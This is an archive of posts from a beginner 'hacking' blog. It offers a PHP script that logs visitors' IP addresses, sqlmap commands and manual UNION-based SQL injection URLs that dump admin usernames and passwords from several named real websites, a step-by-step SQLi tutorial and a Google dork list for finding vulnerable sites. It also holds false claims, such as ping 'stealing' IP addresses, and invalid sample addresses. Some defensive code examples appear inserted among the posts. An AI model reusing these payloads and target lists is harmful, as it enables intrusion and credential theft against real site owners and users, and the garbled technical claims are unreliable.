C-T-H

Hacking - Official weblog, with update of new Hacking Tips, Tricks and Security Tips for Beginners Guide inside internet world.

A blog (a truncation of the expression web log) is a discussion or informational site published on the World Wide Web and consisting of discrete entries ("posts") typically displayed in reverse chronological order (the most recent post appears first).


Following are some of the advantages of Come To Hack:

  • Easy to learn, step by step.
  • Best for hacking beginners.
  • It’s a beautiful place to learn professional hacking easily.

Wednesday, 17 December 2014


How to Locate a Computer With an IP address

[i]

IP stands for Internet Protocols. An IP address is the address of a server or of a person's computer that is connected to the internet. Everyone on the internet has an IP address, and once you find out what it is, you know exactly where they are, and you can begin to hack them.
Internet Protocols Addresses are usually made up of random numbers separated by dots. Every IP address is unique; no one can have the same one. This is why it is very important that you're careful when typing: you do NOT want to accidentally hack the wrong person/network.

Examples:

  • 66.17.44.186
  • 81.73.50.42
  • 192.168.1.1
  • 127.0.0.1
  • 84.10.1.5982
  • 17.44.186
  • 816.83.337.04
Obtaining a target's IP address is the first step to prepare for an attack. Explained below are methods of obtaining a victim's IP address.

Ping - the easiest way to steal an IP

Ping is a tool used to endlessly make requests to a server or another person. It works with both IP addresses and domain names. Domain names are the addresses that you type in to go to a website. Domain names are easier to remember, which is why the internet was invented.
Either way, by pinging a site, you can easily overload it with requests, and at the same time obtain the IP. Ping is supported in Microsoft DOS, as shown below:



As you see, the hacker here is using Windows XP (a good choice), and in order to get the IP of cometohack.com, the only thing he had to do was open up a DOS prompt and type in ping cometohack.com. Upon doing so, cometohack.com was instantly hit with 4 requests, which distracted their server long enough for Ping to steal the IP address.


[ii]

An ultimate hack which enables you to trace anyone anywhere in the world


Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. Finding out someone's IP address is like finding their phone number: an IP address can be used to find the general location where that person lives. Now while most of the tutorials on the net teach you how to steal an IP address via MSN, or any other chat software, in this post I’ll show you how to find the IP address of someone's computer using a script. Using this method for hacking someone's IP address is very easy and effective, so just follow the steps below.

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.

How to Hack Someone's IP Address?


Alright, I'm gonna give you this script, that you write in the index.php. It will redirect them to http://www.google.com/, but you can change that in the script.

Here is the script:

Code:


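<?php
$file = 'IPz.txt';
$handle = fopen($file, 'a');
// Redirect when no "p" parameter is supplied; the script keeps running after header().
if (!isset($_GET['p'])) { header('Location: http://google.com'); }
// Double quotes are needed for \r\n to be written as a line break.
fwrite($handle, (isset($_GET['p']) ? $_GET['p'] : '') . ': ' . $_SERVER['REMOTE_ADDR'] . "\r\n");
fclose($handle);
?>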

1. First of all you need to make a new .txt document on the website you're uploading this to. Call it IPz.txt (you can change that in the script as well, where it says $file = 'IPz.txt'; in the second line). Then change the CHMOD to 777.

2. Now you need to paste the script above into a .php document, and upload it.

3. Now you make people visit your site, and they will get redirected to Google.

4. To view the IP, you simply add "/IPz.txt" after your domain, and you'll see the IP.


This is a very simple but effective method for stealing someone's IP address.
Hope you'll find this tutorial useful. Happy Hacking :)

Friday, 12 December 2014


12 Simple Steps To Become A Hacker


Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude of curiosity and of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages and operating systems, and the journey of learning goes on and on. Some people think that a hacker is always a criminal who does illegal things, but they are wrong. Actually many big companies hire hackers to protect their systems and information, and these hackers are highly paid. We have prepared a list of the 12 most important steps necessary to become a hacker. Have a deeper look.

1. Learn UNIX/LINUX

UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install one of the freely available open source versions of LINUX on your desktop, as without learning UNIX/LINUX it is not possible to become a hacker.


2. Code in C language 

C programming is the base of learning UNIX/LINUX, as this operating system is coded in C, which makes it the most powerful language compared to other programming languages. The C language was developed by Dennis Ritchie in the late 1970’s. To become a hacker you should master the C language.

3. Learn to code in more than one Programming Language

It is important for a person in the hacking field to learn more than one programming language. There are many programming languages to learn, such as Python, JAVA and C++. Free eBooks and tutorials are easily available online.

4. Learn Networking Concepts

Another important and essential step to become a hacker is to be good at networking concepts and to understand how networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in a system.
Understanding what LAN, WAN, VPN and Firewall are is also important.
You must have a clear understanding of, and be able to use, network tools such as Wireshark and NMAP for packet analysis, network scanning etc.

5. Learn More Than One Operating Systems 

It is essential for a hacker to learn more than one operating system. There are many other operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, and a hacker needs it in order to exploit the system.

6. Learn Cryptography

To become a successful hacker you need to master the art of cryptography. Encryption and decryption are important skills in hacking. Encryption is widely used in several aspects of information system security: authentication, confidentiality and integrity of data. Information on a network, such as passwords, is in encrypted form. While hacking a system, these encrypted codes need to be broken, which is called decryption.

7. Learn more and more about hacking

Go through various tutorials and eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

8. Experiment A Lot

After learning some concepts, sit and practice them. Set up your own lab for experimental purposes. You need a good computer system to start with, as some tools may require a powerful processor, RAM etc. Keep on testing and learning until you breach a system.

9. Write Vulnerability (Loop hole program)

A vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.


10. Contribute To Open Source Security Projects

An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA and APACHE offer open source projects. Contribute and be a part of them; even if your contribution is small, it will add a big value to your field.

11. Continue never ending Learning 

Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems.

12. Join Discussions and meet hackers 

Most important for a hacker is to build a community or join forums and discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking, where you can get more from experts.

Saturday, 4 October 2014


How To Hack, Learn Hacking Step by Step [Videos Tut]

Shell Upload using Live http Header
shell upload using live http header from umer siddiqui on Vimeo.

Hack Website using Arbitrary File
hack website using Arbitrary File Upload Vulnerability from umer siddiqui on Vimeo.

HTML File Upload Vulnerability
html file upload vulnerablity from umer siddiqui on Vimeo.

Manual SQLi
sqli manual from umer siddiqui on Vimeo.

Shell Upload Vulnerability
Shell Upload Vulnerablity from umer siddiqui on Vimeo.

How to Hack Website Using Sql Map
How to Hack Website Using Sql Map By Umer Siddiqui from umer siddiqui on Vimeo.

Saturday, 2 August 2014


How to install SQLMap on Windows XP/7/8

Welcome back. This is the ComeToHack Team's new post of the week. The last lecture was about

 "How To Hack Website Through SQLMap"


DoT Zeroo here. Today I'm going to show you how to install SQLMap on Windows.

First download python2.7 or sqlmap. After downloading, install python2.7.

Follow me:

Open the python2.7 setup, select "Install for all users" and hit the Next button.


Install Python on the C drive. Click Next.

Click Next.


Click the Finish button :D

After the Python installation is complete, copy the sqlmap folder and paste it into the python2.7 folder.


OK, now go to Run, type cmd and hit Enter.


After opening the command prompt, type the following commands:


1st: type "cd../" without quotes.

2nd: once again type "cd../".

3rd: type "cd python27" (change this if your python folder has a different name). Now check that it's working :P

4th: type "cd sqlmap" without quotes.

5th: once again type the same command, "cd sqlmap".

Now your sqlmap is installed ;) I hope you like this tutorial.

That's it about SQLMap


Like :- www.facebook.com/cometohack

Monday, 14 July 2014


How To Hack Website Through SQLMAP (Step By Step GuideLine)

Everyone who wants to learn hacking must have knowledge of sqlmap and site vulnerability.

Requirements :-
Python27 or Sqlmap and a website with an SQLi vulnerability

If you don't have a vulnerable site, find one using Google Dorks.

Let's start. Open your terminal and run sqlmap.





Now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 --dbs" without quotes and hit Enter
(--dbs = databases)


You can see that we got 2 databases:
 [*] c2deuts_ice
 [*] information_schema

Now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice --tables" without quotes (-D means database name).


We got 25 tables, but we need only the admin table.

Now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice -T admin --columns" without quotes (-T takes the table name).


You can see that we got the admin usernames and passwords. To get the passwords, type the following command:

"sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice -T admin -C username,password --dump" without quotes


You can see that we got the admin users and passwords.

Enjoy, happy hacking.
Like my page on Facebook www.facebook.com/ComeToHack and share this tutorial.

Thanks for visiting :D


Monday, 30 June 2014


How to hack website manual (Full Guide)



Hello ComeToHack.com *-.-*
Once again ComeToHack here. Today I'm going to start SQL injection. Today is the first class, so let's start.

Requirements :-

Firefox Browser


Vulnerable site

OK, I already have a vulnerable site, like this:

http://www.morephotosradio.com/transcript.php?interview_id=2021

Step 1
=> Check whether this website is vulnerable or not: put ' at the end of the URL, like

http://www.morephotosradio.com/transcript.php?interview_id=2021'

Yes, I got an SQL error, as you can see.

Step 2
=> Find the table number using the order by--+- query. For example:

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+-  (No Error)

and so on. When we get an error, this gives the table number, like

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+-  (No Error)

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+-  (Error)

This means it has 46 table numbers.

Step 3
=> Go to union based => Union statement and select INT,INT

Step 4
=> Now enter the table number value and click OK

Step 5
=> After clicking OK you will see that this auto-types the numbers 1 to 46. Then click Execute to check that it's working.

It's working, we didn't get any error :D

Step 6
=> Put - in front of the value at the end of the link, like this:
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-

You can see that when we put - we got column number 6.

Step 7
=> Now we need the version:
replace the number 6 with the query "version()"

You can see that we got the SQL version. If you want more information, like user name, host name and database, use these queries:

For Version = version()
For Database = database()
For use = use()
For Host = host@@

Step 8
=> Now we need the table information, so replace the number 6 with the query "group_concat(table_name)" without quotes, and at the end of the URL use the query "from information_Schema.tables where table_schema=database()--+-" without quotes, like

For Tables

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-

You can see that we got all the table names. We need the admin user name because we want to hack the website :D

Step 9
=> Now replace "database()" with User

Now select user, go to "sqli basics", select "char()", paste "user" and click OK, like

And replace table with columns, like this:
For columns
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-
Now click Execute.


Step 10
Now we need the admin email ID and password, so use this query:

Replace column_name with the data we need (",0x3a," is used when we need more data), and at the end of the URL type the table name.

For data

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-

You can see that we got all the admin emails and passwords ;) :D

I hope you like this tutorial.

Thanks for visiting
  



Saturday, 28 June 2014


How to Check all Data in Sqli Injection

Welcome ComeToHack *-.-*
Today I'm going to show you how we can check all the data in an SQLi site. We can check all the tables, columns, database name, version, user, host, etc. in only a few minutes :D

Let's Start

Requirements :-

=> Vulnerability Site: http://www.arts.cuhk.edu.hk/~lal/index.php?id=9
=> Sqli Codes

=> Now simply find the web orders or table number, like this


=> Copy the SQLi code and replace the number 6 with it


=> After pasting the code click Execute. You can see that we got all the tables, columns and databases, and the version :D


I hope you like this tutorial ;) Thanks for visiting, like and share :)


Wednesday, 25 June 2014


SQL Injection [Hacking] Learn Step by Step




Here you will find a very detailed, step by step tutorial written by me (@MaKhDooM_S) on SQL injection. This is purely for educational purposes and is to be used at the discretion of the reader.
First we have to know what SQL injection is exactly.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

That is the first paragraph of the wikipedia page for SQLi (SQL injection) found here:
http://en.wikipedia.org/wiki/SQL_injection

I would advise reading the entire page.

What is covered in this tutorial?

Part One - Website Assessment
Section One - Finding a vulnerable website
Section Two - Determining the amount of columns
Section Three - Finding which columns are vulnerable

Part Two - Gathering Information
Section One - Determining the SQL version
Section Two - Finding the database

Part Three - The Good Stuff
Section One - Finding the table names
Section Two - Finding the column names
Section Three - Displaying the column contents
Section Four - Finding the admin page

Now let's begin.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Section One - Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. For those of you that are unfamiliar with the term "dorks", I will try to explain.

Dorks are website URLs that are known to be vulnerable. In SQL injection these dorks look like this:

Code:
inurl:buy.php?id=

This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:

Code:
http://www.site.com/buy.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

Code:
http://www.site.com/buy.php?id=1'
or
http://www.site.com/buy.php?id='1

After pressing enter, if this website returns an error such as the following:

Code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7


Or something along those lines, this means it's vulnerable to injection.

In the case where you are to find a website such as this:

Code:
http://www.site.com/buy.php?id=1&dog;catid=2

Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:

Code:
http://www.site.com/buy.php?id='1&dog;catid='2

There are programs that will do this for you, but to start off I would suggest simply doing things manually, using Google, and so I won't post any for you guys. If you feel compelled to use one anyway, I recommend the Exploit Scanner by Reiluke.

Section Two - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command :D

NOTE: SQL does not care whether or not your letters are capitalized and I'm just doing it for clarity; for all it cares your queries could look like this:

Code:
http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

Code:

http://www.site.com/buy.php?id=1 ORDER BY 1-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 2-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 3-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 4-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 5-- <---ERROR!


This means that there are four columns!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.
VERY IMPORTANT!

Section Three - Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number).

buy.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.
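Why the inputs in Part One behave as described, seen from the code that has to be fixed: a query built by string concatenation executes the ORDER BY and UNION SELECT text as SQL, while integer validation plus a bound parameter never does. This is an added example, not part of the original tutorial; it uses Python's sqlite3 as a stand-in for the PHP/MySQL site, and the products table, its row and the function names are assumptions constructed for the demonstration.

```python
import re
import sqlite3

QUERY = "SELECT id, name, price, descr FROM products WHERE id="

def make_db():
    """Constructed sample data: a four-column table, as in the buy.php example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products "
               "(id INTEGER PRIMARY KEY, name TEXT, price REAL, descr TEXT)")
    db.execute("INSERT INTO products VALUES (1, 'Widget', 9.99, 'constructed sample row')")
    return db

def lookup_vulnerable(db, raw_id):
    # The parameter is pasted into the SQL text, so everything after the
    # number is parsed as SQL. This is the flaw the tutorial relies on.
    return db.execute(QUERY + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    # 1. Strong typing: the parameter must be a plain decimal integer.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a non-negative integer")
    # 2. Parameter binding: the value travels separately from the SQL text,
    #    so it can never change the structure of the statement.
    return db.execute(QUERY + "?", (int(raw_id),)).fetchall()

def outcome(fn, db, raw_id):
    """Run one lookup and reduce the result to rows, 'sql-error' or 'rejected'."""
    try:
        return fn(db, raw_id)
    except sqlite3.Error:
        return "sql-error"   # the visible database error the tutorial watches for
    except ValueError:
        return "rejected"    # stopped before any SQL was executed

# The id values used in Part One of the tutorial.
PAGE_INPUTS = ["1", "1'", "1 ORDER BY 4--", "1 ORDER BY 5--",
               "-1 UNION SELECT 1,2,3,4--"]

def compare():
    """Map each input to (vulnerable outcome, hardened outcome)."""
    db = make_db()
    return {raw: (outcome(lookup_vulnerable, db, raw),
                  outcome(lookup_hardened, db, raw))
            for raw in PAGE_INPUTS}

if __name__ == "__main__":
    for raw, (vulnerable, hardened) in compare().items():
        print(f"{raw!r:32} vulnerable={vulnerable!r} hardened={hardened!r}")
```

In the concatenated version the application's own row is replaced by the attacker-chosen row 1,2,3,4; in the hardened version the same input never reaches the database.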

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Section One - Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Code:
5.1.47-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Section Two - Finding the database

Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience following these steps and finding the database may sometimes lead to a higher success rate.

To find the database we use a query like the one below:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--

Congrats! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Stuff

This is the fun part where we will find the usernames, emails and passwords!

Section One - Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit it starts from 0,1 which means that the 30th is actually the 31st :P

You now have all the table names!


Section Two - Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
http://www.swingnote.com/tools/texttohex.php
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x"; all this does is tell the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Section Three - Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Section Four - Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:
http://www.site.com/admin
http://www.site.com/adminlogin
http://www.site.com/modlogin
http://www.site.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.
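Each stage of the walkthrough above leaves a recognisable request in the web server's access log, so the sequence can be picked out from the defender's side. The following is an added example, not part of the original tutorial; the log lines are constructed (documentation-range addresses), and the stage names and the two-stage threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (combined log format, documentation-range IPs).
# The first client replays the tutorial's stages; the second is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jun/2014:10:00:01 +0000] "GET /buy.php?id=1%27 HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jun/2014:10:00:09 +0000] "GET /buy.php?id=1%20ORDER%20BY%201-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jun/2014:10:00:15 +0000] "GET /buy.php?id=1%20ORDER%20BY%204-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jun/2014:10:00:21 +0000] "GET /buy.php?id=1%20ORDER%20BY%205-- HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jun/2014:10:00:40 +0000] "GET /buy.php?id=-1+UNION+SELECT+1,2,3,4-- HTTP/1.1" 200 2050 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jun/2014:10:01:02 +0000] "GET /buy.php?id=-1+UNION+SELECT+1,@@version,3,4-- HTTP/1.1" 200 2061 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Jun/2014:10:01:30 +0000] "GET /buy.php?id=-1+UNION+SELECT+1,group_concat(table_name),3,4+FROM+information_schema.tables+WHERE+table_schema=database()-- HTTP/1.1" 200 2300 "-" "Mozilla/5.0"
198.51.100.20 - - [25/Jun/2014:10:02:00 +0000] "GET /buy.php?id=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.20 - - [25/Jun/2014:10:02:10 +0000] "GET /search.php?q=order+by+price HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.20 - - [25/Jun/2014:10:02:30 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client address and request target of one combined-format log line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) HTTP/[\d.]+" \d{3} ')

# One pattern per tutorial stage, matched against URL-decoded parameter values.
STAGES = {
    "quote_probe":   re.compile(r"^(?:'\d+|\d+')$"),                # id=1' or id='1
    "order_by":      re.compile(r"\border\s+by\s+\d+\s*--", re.I),  # ORDER BY n--
    "union_select":  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version|\bversion\(\)", re.I),
    "schema_enum":   re.compile(
        r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I),
}
ORDER_BY_N = re.compile(r"\border\s+by\s+(\d+)", re.I)

def classify(value):
    """Return the set of stage names whose pattern matches one decoded value."""
    return {name for name, rx in STAGES.items() if rx.search(value)}

def analyze(log_text):
    """Per client: stages seen, ORDER BY indexes tried, and request count."""
    seen = defaultdict(lambda: {"stages": set(), "order_by": [], "requests": 0})
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not a combined-format request line
        ip, target = match.groups()
        entry = seen[ip]
        entry["requests"] += 1
        # parse_qsl decodes %XX and '+', so encoded payloads are matched too
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            entry["stages"] |= classify(value)
            entry["order_by"] += [int(n) for n in ORDER_BY_N.findall(value)]
    return {ip: {"stages": sorted(e["stages"]), "order_by": e["order_by"],
                 "requests": e["requests"]} for ip, e in seen.items()}

def flagged(report, min_stages=2):
    """Clients that hit several distinct stages; one stray keyword match is not enough."""
    return sorted(ip for ip, e in report.items() if len(e["stages"]) >= min_stages)

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip in flagged(report):
        print(ip, report[ip])
```

The second client's search for "student union select committee" matches one pattern on its own, which is why the alert is raised on a combination of stages rather than on a single keyword.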

And that concludes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Comment and Rate!

Give credit where credit is due!

I do keep my promises so here is what I said I would include:

Dork List

trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=